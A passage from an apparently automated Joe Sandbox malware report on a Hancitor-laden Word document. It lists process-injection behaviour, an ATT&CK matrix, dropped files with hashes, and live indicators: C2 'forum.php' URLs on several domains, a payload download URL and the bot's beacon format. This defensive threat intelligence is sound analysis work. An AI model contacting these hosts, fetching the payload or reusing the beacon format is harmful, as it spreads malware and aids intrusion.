              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: watiounds.ru
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 95.47.161.162 80Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 50.16.249.42 80Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: caperesto.com
              Contains functionality to inject threads in other processesShow sources
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C3880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,3_2_001C3880
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYSJump to behavior
              Source: rundll32.exe, 00000002.00000002.3150654116.00000000006A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150805208.00000000007F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: rundll32.exe, 00000002.00000002.3150654116.00000000006A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150805208.00000000007F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: rundll32.exe, 00000002.00000002.3150654116.00000000006A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150805208.00000000007F0000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00184A34
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,3_2_0018A9A0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_001852F0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_001852EE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00184B40
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_0018954C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_00189598
              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018804C GetLocalTime,3_2_0018804C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00192358 GetUserNameA,GetUserNameA,GetEnhMetaFileA,GetEnhMetaFileA,VirtualAllocEx,LoadCursorA,DeleteObject,DeleteObject,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,LoadCursorA,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,AddFontResourceW,3_2_00192358
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C1AA0 GetVersion,wsprintfA,wsprintfA,3_2_001C1AA0

              Remote Access Functionality:

              barindex
              Yara detected HancitorShow sources
              Source: Yara matchFile source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2504, type: MEMORY
              Source: Yara matchFile source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting22Path InterceptionProcess Injection212Disable or Modify Tools11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution23Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information21NTDSSystem Information Discovery26Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSecurity Software Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncVirtualization/Sandbox Evasion1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\furmt.f100%Joe Sandbox ML

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              3.2.rundll32.exe.1c0000.3.unpack100%AviraTR/Hijacker.GenDownload File
              3.2.rundll32.exe.180000.1.unpack100%AviraHEUR/AGEN.1108767Download File
              3.2.rundll32.exe.c0174.0.unpack100%AviraTR/Kazy.4159236Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
              http://thuniopme.ru/8/forum.php0%Avira URL Cloudsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://caperesto.com/8/forum.php0%Avira URL Cloudsafe
              http://gru77.ru/6fdsg45ehdf.exe.ru/6fdsg45ehdf.exe990%Avira URL Cloudsafe
              http://watiounds.ru/8/forum.php0%Avira URL Cloudsafe
              http://gru77.ru/6fdsg45ehdf.exe100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              elb097307-934924932.us-east-1.elb.amazonaws.com
              		107.22.233.72
              		truefalse
                		high
                watiounds.ru
                		95.47.161.162
                		truetrue
                  		unknown
                  gru77.ru
                  		unknown
                  		unknowntrue
                    		unknown
                    api.ipify.org
                    		unknown
                    		unknownfalse
                      		high
                      caperesto.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://thuniopme.ru/8/forum.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://api.ipify.org/false
                          		high
                          http://caperesto.com/8/forum.phptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://watiounds.ru/8/forum.phptrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpfalse
                            		high
                            http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpfalse
                              		high
                              http://investor.msn.comrundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmpfalse
                                    		high
                                    http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDrundll32.exe, 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://investor.msn.com/rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.%s.comPArundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.hotmail.com/oerundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpfalse
                                        		high
                                        http://gru77.ru/6fdsg45ehdf.exe.ru/6fdsg45ehdf.exe99rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://gru77.ru/6fdsg45ehdf.exerundll32.exe, 00000003.00000003.2806499777.0000000000404000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://api.ipify.orgrundll32.exefalse
                                          		high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          50.16.249.42
                                          		unknownUnited States
                                          		14618AMAZON-AESUStrue
                                          95.47.161.162
                                          		watiounds.ruCzech Republic
                                          		12722RECONNRUtrue

                                          Private

                                          IP
                                          192.168.2.22
                                          192.168.2.255

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:399782
                                          Start date:29.04.2021
                                          Start time:08:15:13
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 12m 15s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:0427_5079687843613.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:6
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winDOC@5/12@174/4
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 48.4% (good quality ratio 47.6%)
                                          • Quality average: 86.4%
                                          • Quality standard deviation: 22.7%
                                          HCA Information:
                                          • Successful, ratio: 79%
                                          • Number of executed functions: 31
                                          • Number of non-executed functions: 36
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Report size getting too big, too many NtCreateFile calls found.
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:15:42API Interceptor4258x Sleep call for process: rundll32.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          50.16.249.42vVNILsHyqm.exeGet hashmaliciousBrowse
                                          • api.ipify.org/?format=xml
                                          95.47.161.162jers.dllGet hashmaliciousBrowse
                                          • sumbahas.com/8/forum.php

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          elb097307-934924932.us-east-1.elb.amazonaws.comSThy2G7fGR.exeGet hashmaliciousBrowse
                                          • 50.19.216.111
                                          if.ps1Get hashmaliciousBrowse
                                          • 50.19.216.111
                                          jers.dllGet hashmaliciousBrowse
                                          • 54.235.83.248
                                          ac8e3612_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 50.19.252.36
                                          Onetap.com_Cracked_Auth_Bp_UPDATED_23.04.21.exeGet hashmaliciousBrowse
                                          • 54.225.165.85
                                          furmt.f.dllGet hashmaliciousBrowse
                                          • 23.21.252.4
                                          eGXZrIOs3P.exeGet hashmaliciousBrowse
                                          • 54.235.175.90
                                          ff.exeGet hashmaliciousBrowse
                                          • 54.225.222.160
                                          8s7bEDfYhT.exeGet hashmaliciousBrowse
                                          • 54.225.155.255
                                          8c6b2adbcdd8b7f0a0419fd08e5cbd0f7bc52cc702da4.exeGet hashmaliciousBrowse
                                          • 107.22.233.72
                                          S1g5ShTDXD.exeGet hashmaliciousBrowse
                                          • 54.243.121.36
                                          RykzV2Bdm0.exeGet hashmaliciousBrowse
                                          • 107.22.233.72
                                          9fc4c09d4cb89762626fce008d9840abb128c99ec3cd1.exeGet hashmaliciousBrowse
                                          • 54.243.121.36
                                          eiMDpf6wV6.exeGet hashmaliciousBrowse
                                          • 54.225.169.203
                                          vVNILsHyqm.exeGet hashmaliciousBrowse
                                          • 50.16.249.42
                                          FxHNFwShW0.exeGet hashmaliciousBrowse
                                          • 54.225.165.85
                                          CvzZ4YD5k2.exeGet hashmaliciousBrowse
                                          • 54.225.144.221
                                          fJWSjgc7FE.exeGet hashmaliciousBrowse
                                          • 54.225.169.203

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          AMAZON-AESUSSThy2G7fGR.exeGet hashmaliciousBrowse
                                          • 50.19.216.111
                                          if.ps1Get hashmaliciousBrowse
                                          • 50.19.216.111
                                          jers.dllGet hashmaliciousBrowse
                                          • 54.225.155.255
                                          #Ud83d#Udcde Maerskdrilling.com AudioMessage_10-86588.htmGet hashmaliciousBrowse
                                          • 35.174.151.106
                                          ac8e3612_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 50.19.252.36
                                          Onetap.com_Cracked_Auth_Bp_UPDATED_23.04.21.exeGet hashmaliciousBrowse
                                          • 54.225.165.85
                                          Fraud Case.docxGet hashmaliciousBrowse
                                          • 35.168.131.73
                                          Fraud Case.docxGet hashmaliciousBrowse
                                          • 52.22.122.101
                                          furmt.f.dllGet hashmaliciousBrowse
                                          • 23.21.252.4
                                          1103305789.exeGet hashmaliciousBrowse
                                          • 3.211.60.235
                                          ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                          • 18.205.135.125
                                          IbYxIhdXf1.docGet hashmaliciousBrowse
                                          • 54.83.52.76
                                          IbYxIhdXf1.docGet hashmaliciousBrowse
                                          • 54.83.52.76
                                          eGXZrIOs3P.exeGet hashmaliciousBrowse
                                          • 54.235.175.90
                                          PI34567890987.exeGet hashmaliciousBrowse
                                          • 3.211.60.235
                                          8s7bEDfYhT.exeGet hashmaliciousBrowse
                                          • 54.225.155.255
                                          VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                          • 3.223.115.185
                                          confirm this order and sign PI.exeGet hashmaliciousBrowse
                                          • 18.234.20.125
                                          cZthzZwzJz.exeGet hashmaliciousBrowse
                                          • 54.90.47.105
                                          RECONNRUjers.dllGet hashmaliciousBrowse
                                          • 95.47.161.162
                                          OAPAU84dG4.exeGet hashmaliciousBrowse
                                          • 91.193.181.158
                                          bicho_malo.exeGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          Order confirm-13122018.docGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          Order confirm-13122018.docGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          Order confirm-13122018.docGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          readerdc_en_us_xa_crd_install.exeGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          OpenInvoiceForReview 112018.pdfGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          readerdc_en_crd_install.exeGet hashmaliciousBrowse
                                          • 37.252.9.68
                                          http://krdstud.ru/wp-content/ACCOUNT/New-Invoice-PZ34190-WD-66678/<https://urldefense.proofpoint.com/v2/url?u=http-3A__krdstud.ru_wp-2Dcontent_ACCOUNT_New-2DInvoice-2DPZ34190-2DWD-2D66678_&d=DwMFaQ&c=s_qrfillwjMFekKE6c2C44vrQ0H7PMSDUl9OhCCQ7eI&r=Z3iQQtd6czvsswtAS_MisI7IxfCJRGgFByNmnZfgasM&m=vBskeVClHRkZ71TCKOyFFOBLwC-ar6C8Y3E959xIZGI&s=vLqtyTFtGdsCFSXRwzjYiL5sTO2Q1GKx1C0YoGylCFU&eGet hashmaliciousBrowse
                                          • 5.45.81.37
                                          mn.hndl.all-2.apkGet hashmaliciousBrowse
                                          • 5.45.82.51
                                          F0082D4.exeGet hashmaliciousBrowse
                                          • 5.45.83.41
                                          resume.docGet hashmaliciousBrowse
                                          • 95.47.161.68
                                          resume.docGet hashmaliciousBrowse
                                          • 95.47.161.68
                                          417.docGet hashmaliciousBrowse
                                          • 95.47.161.68
                                          417.docGet hashmaliciousBrowse
                                          • 95.47.161.68

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3976C00.emf
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):4976
                                          Entropy (8bit):3.358345176057016
                                          Encrypted:false
                                          SSDEEP:48:0KN0w3l/sdBg6qjpLkwOEG6kpnydHkba1K2:H0WlqBFq9gV+EM
                                          MD5:36E0C18DFD69607FA569CA25188D41FB
                                          SHA1:294C249AA6494505041658E844C2A9EDA3057F43
                                          SHA-256:87E59228E4803C61117349C76001B1C5C2F852C9185AA3FAA3A2864E5FFD15AF
                                          SHA-512:A6237FEFD6D570C74DB5DC108A5F732A8413980634CCCB92FE822568B4F4D890A738DBDB35368A36F24A85151C2E7A4A943351444A0100C551A63FFB342F3629
                                          Malicious:false
                                          Reputation:low
                                          Preview: ....l...........(.../................... EMF....p.......................V.......i......................:...............................5...R...p...................................S.e.g.o.e. .U.I.....................................................\.......@W......(.%#......................6,........,...0X.......................W...............W......................a$~0......%#............................ .%#......$#....................................................0X......IX......XY..........dv......%...................................r...............&............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BC642F3-025D-4403-9DBE-B492A11253DC}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\furmt.f
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):245760
                                          Entropy (8bit):6.820832542888292
                                          Encrypted:false
                                          SSDEEP:3072:mojtg6jca6iMdxkpYQcqIxLuuwhb0NETyLsrq9QDLWNHKqxgojtg6jca6iMdxkpA:mQinIRGLgDUgQinIRGLgDU
                                          MD5:3919D906E5C9E96B346DFC8FFD191C7A
                                          SHA1:21264A9C28F57A619EB0A11145FEB5AA0442A278
                                          SHA-256:47F6A6E063F5DB45441A013C7AC43526CF66A7427BC06FD3A44E7305C8D89675
                                          SHA-512:1158945FB4E9A44198547C9284F3855141EDB99D5C6FBBBD13F119782C32E3BACAD4B253C0DDFE2CE4C22A62D4C95CE72F81219146253153CB6A8767293A2765
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          Reputation:low
                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................. ...........-.......0....@..........................................................................P...............................`......................................................................................CODE............. .................. ..`DATA.........0.......$..............@...BSS..........@.......*...................idata.......P.......*..............@....reloc.......`.......6..............@..P.rsrc................P..............@..P....................................@..P........................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\furmt.f:Zone.Identifier
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):52
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:gAWY3+/lAWY3n:qY3ARY3n
                                          MD5:7751FFC449B1D4B0F6D5064106C31B47
                                          SHA1:1A197DC9CC9FE08CFCEA7BF65FFA456DC6478837
                                          SHA-256:959E79C6EA7DB2EB3018A564871D460A33918715CF472E3A107FBFFC4B79FF36
                                          SHA-512:25D256CAF779B4FCB07ABB5047C4E5BAA2D271641ACB5FBE7CF7529320ED08FD62D981B29D7E49E431ECE510884567D236EF91445DFEE3514147C2863288AAEC
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: [ZoneTransfer]..ZoneId=3..[ZoneTransfer]..ZoneId=3..
                                          C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_colorschememapping.xml
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
